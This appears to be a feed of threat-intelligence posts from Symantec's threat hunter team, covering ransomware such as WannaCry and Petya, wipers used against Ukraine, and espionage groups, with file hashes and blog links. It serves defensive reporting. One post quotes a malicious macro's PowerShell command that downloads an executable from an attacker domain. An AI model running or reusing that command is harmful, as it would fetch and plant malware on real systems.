Symantec and Carbon Black's threat hunters bring you the latest threat intelligence from the IT security world.

#NEW - Backdoor.Mistic: New Backdoor May be Linked to #Ransomware Access Broker - New backdoor appears to be linked to #KongTuke, an initial access broker whose #ModeloRAT toolkit has fed #Qilin & other ransomware operations. Read more: security.com/threat-intellig…
New #wiper malware being used in attacks on #Ukraine 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591
NEW: This is Daxin, the most advanced Chinese espionage tool we've ever found. Used to spy on governments worldwide. symantec-enterprise-blogs.se…
Symantec analysts have confirmed #Petya #ransomware, like #WannaCry, is using #EternalBlue exploit to spread
Breaking news on our SolarWinds investigation. We've found a previously undocumented piece of malware called Raindrop which was used by the attackers against some targets. bit.ly/3p9jaUJ #SolarWinds #Raindrop #Sunburst
Update on #wiper attacks against #ukraine. In some attacks ransomware was also deployed against affected organizations at the same time as the wiper, likely as a decoy or distraction. symantec-enterprise-blogs.se… IOC: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382
#WannaCry has code to provide unique bitcoin address for each victim but defaults to hardcoded addresses as a result of race condition bug
New strain of #petya ransomware spreading in Europe. Symantec protects as Ransom.Petya #ransomware
#Petya checks for preexisting infection by looking for its own filename, usually C:\windows\perfc. Creating this file may help as a killswitch
Evidence #WannaCry attackers fixed Bitcoin bug & released variant of malware 13 hours after original; but most infections contain flaw
Interesting detail from our analysis of the decoy ransomware used in #ukraine #wiper attacks. Strings made mocking references to U.S. president Joe Biden.
Chinese facial recognition company left database exposed online cnet.com/news/chinese-facial…
Another wiper attack targeting organizations in Albania by the Iranian Druidfly group. SHA256: 81eb22828306f3197b35fef2035cef2c548f587f8511902852964850023389d7 #wiper #druidfly #iran (1 of 5)
#Wannacry can't use unique Bitcoin addresses because of bug, meaning attackers cannot track payment. Users unlikely to get files restored
BREAKING: New Symantec research reveals stronger links between #Lazarus and #WannaCry symc.ly/2raFcvI
Our Threat Hunter Team has encountered a new variant of #SiestaGraph, malware that interacts with Microsoft’s Graph API for command and control via Outlook and OneDrive. File hash: fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb (1/2)
Numerous organizations breached in six-year campaign against the energy sector symc.ly/2eJPriJ #dragonfly #infosec
#Petya ransomware outbreak: Here’s what you need to know symc.ly/2thKdTQ #infosec #cybersecurity
Symantec has no evidence of a Wannacry email infection vector and no evidence of a non-killswitch version of the worm. #wannacry #wcry
BREAKING: First evidence #Vault7 tools were used in known cyberattacks. Targets in 16 countries affected. symc.ly/2ogFhM8 #Longhorn
#Spam campaign baits users with #Visa rewards emails that spread #TeslaCrypt #ransomware symc.ly/1WKaH5f
Chinese APT Group #Cicada (aka #APT10) Widens Targeting in Recent Espionage Activity - gov orgs and NGOs among targets. Read more: symantec-enterprise-blogs.se… #infosec
THREAD: Latest on #WhisperGate wiper attacks. Thanks to cooperation with the community, we can confirm related samples were being built by actors and possibly deployed to unknown victims as early as October 2021. Other unconfirmed samples may date even earlier. [1/4]
Our Threat Hunter Team has found some evidence that attackers linked to Black Basta may have exploited CVE-2024-26169 as a zero-day prior to patching symantec-enterprise-blogs.se… #ZeroDay #Ransomware #BlackBasta
. @Symantec has now blocked 47 million attempted #WannaCry ransomware attacks worldwide. Heat map shows how rapidly the #ransomware spread.
Symantec uncovers FASTCash malware used by Lazarus group to steal millions from ATMs symc.ly/2zGajkS #LazarusAPT
Hackers hijack WhatsApp and Telegram accounts using security flaws in Signaling System Number 7 (SS7) protocol thenextweb.com/insider/2016/…
Fresh wave of BiBi wiper attacks against Israeli targets this week. Interesting reference in code. #bibwiper (1/2)
Two new #wannacry variants found: One had modified killswitch. Second has killswitch disabled, but ransomware payload doesn't execute.
#Spring4Shell - what you need to know about this new bug. Read more here: symantec-enterprise-blogs.se…
NEW: If #petya finds certain Norton or Symantec processes running it will not use EternalBlue or EternalRomance to spread
Addicted to #PokemonGO? Protect your device from scams, malware, and privacy issues: symc.ly/29HfpTg
Our Threat Hunter team has found evidence of updated tooling by the Clubhorn APT group (aka #SideCopy). Recent attack involved modified version of #NightFury backdoor. (1/5)
Do you want to work in #cybersecurity? Read this advice from 15 women working in the industry symc.ly/2xeetSB #infosec #GHC17
#MobilePrivacy: We tested the top 100 free #Android and #iOS apps. Here's what we found. symc.ly/2MpMeXB
#Cranefly - Threat Actor Uses Previously Unseen Techniques and Tools in Stealthy Campaign symantec-enterprise-blogs.se… #infosec #cybersecurity
Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: nitter.app/HaoZhixiang/status/170… and here cyberhub.am/en/blog/2023/09/…) (1 of 5)
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia. There is VBA macro code: powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe
In-browser #cryptocurrency mining makes an unlikely comeback in 2017 but not everyone is happy. Check out our blog and #infographic for more: symc.ly/2Bg5Bh8 #monero #bitcoin #cryptomining
BREAKING: #Sowbug, previously unknown #cyberespionage group targeting South America and Southeast Asia. symc.ly/2Ad9rCF #Infosec
New information on #ukraine #wiper attacks. Exploit of Microsoft SQL Server vulnerability (CVE-2021-1636) was used in at least one attack. symantec-enterprise-blogs.se…
Android.Doublehidden uses several techniques to hide itself on devices, collect info, display ads symc.ly/2jVDOH8
Hundreds of high-profile Twitter accounts hacked through third-party app gizmodo.com/twitter-accounts…
Destructive #wiper attacks precede Russian invasion of #Ukraine. Here's what we know so far: symantec-enterprise-blogs.se…
#wannacry attackers not giving up on trying to get payments. New message being sent to victims.
Nemty ransomware now being spread by the Trik botnet. Find out more: symantec.com/blogs/threat-in…
Wannacry victims may be able to recover their files. Further details here: medium.com/threat-intel/wann…
Ongoing campaign targeting IIS servers incl one airline in Middle East. Unknown payload (goopdate32.dll), likely sideloaded. Actor & motive unknown. Similar to reported Seedworm (MuddyWater) activity but low confidence. Also some low confidence links to Damselfly activity (1 of 2)
. @Symantec has confirmed that #BadRabbit uses the #EternalRomance exploit to spread. Read our updated blog: symc.ly/2gJjEmx
Working in Cyber Security: “The ability to not shy away from challenges goes a long way in this industry” symc.ly/2JYTTHq #infosec #careers #tech
There’s no “I” in Telegram: Dodgy app looks like legitimate version but with some shady extra features symc.ly/2ANPSAF
What you need to know about the security of voice-activated smart speakers symc.ly/2Ao9v2F
Sodinokibi: Ransomware Attackers also Scanning for PoS Software, Leveraging Cobalt Strike. Read more: bit.ly/2VoiWfB #ransomware #Sodinokibi
Symantec uncovers #Leafminer APT targeting government orgs, businesses in the Middle East since 2017 symc.ly/2MNFOOD
#Tech: The Incredible Hack: Five of the worst on-screen hacking scenes symc.ly/2uOwcil #hacking #infosec
Read our blog to find out how advanced malware #Daxin attempts to evade detection by using communication techniques that can blend in unseen with normal network traffic on a victim network. Learn more: symantec-enterprise-blogs.se… #infosec
REVEALED: Buckeye espionage outfit was using Equation Group tools at least a year prior to the Shadow Brokers leak. Read more: symc.ly/2WuJRoq #apt3 #equation #shadowbrokers
Malicious #PowerShell attacks increased by 661 percent from the last half of 2017 to the first half of 2018. Read more in our blog: symc.ly/2upagYG
Symantec uncovered new espionage operations using cloud services and found evidence of further tools in development. Find out more: symantec-enterprise-blogs.se… #CyberEspionage #CloudServices
Should you be worried about the new #Meltdown and #Spectre vulnerabilities? Here's what you need to know: symc.ly/2E6O73U
Patch now! Oracle fixes a record 334 vulnerabilities in July patch update oracle.com/technetwork/secur…
#IoT has been one of the big areas of concern in #cybersecurity in recent times. Read about it in #ISTR17 symc.ly/2ouQsCl
Malware used in watering hole attacks on Polish banks has tentative links to #Lazarus group symc.ly/2lzHZIU
. @Symantec has identified the #Orangeworm attack group, which uses the #Kwampirs malware to target large healthcare-related firms in the U.S., Europe, and Asia symc.ly/2K1oJjU
Governments in Asia subjected to ongoing espionage campaign by attackers previously linked to #ShadowPad Trojan. symantec-enterprise-blogs.se… #APT #Cyberespionage
Meet #Thrip, an espionage group currently targeting satellite communications, telecoms, and defense companies in the U.S. and SE Asia symc.ly/2JQ1ixq
NEW: Symantec finds evidence #Waterbug attackers may have hijacked a separate espionage group’s infrastructure during attack on target in Middle East. symantec.com/blogs/threat-in… #Turla #Crambus #Oilrig
Symantec can confirm that MEDoc software was used to seed initial infections of #petya ransomware
Nine payments have been made into #Bitcoin wallet associated with #Petya so far #ransomware #infosec
#CyberCrime - Attacks from Malicious IP Hit Multiple Machines in Several Countries link.medium.com/rD2TSjjNr7 #infosec #research
China-based espionage actor may be moonlighting as RA World ransomware affiliate. Read our blog to find out more. security.com/threat-intellig… #ransomware #apt #plugx
North Korean tech freelancers are earning money for authoritarian government msit.go.kr/eng/bbs/view.do;j…
The A to Z of cyber security: From #BEC scams, to DDoS attacks, and #WannaCry. Read our brief guide to the world of #cybersecurity symc.ly/2CTFoC0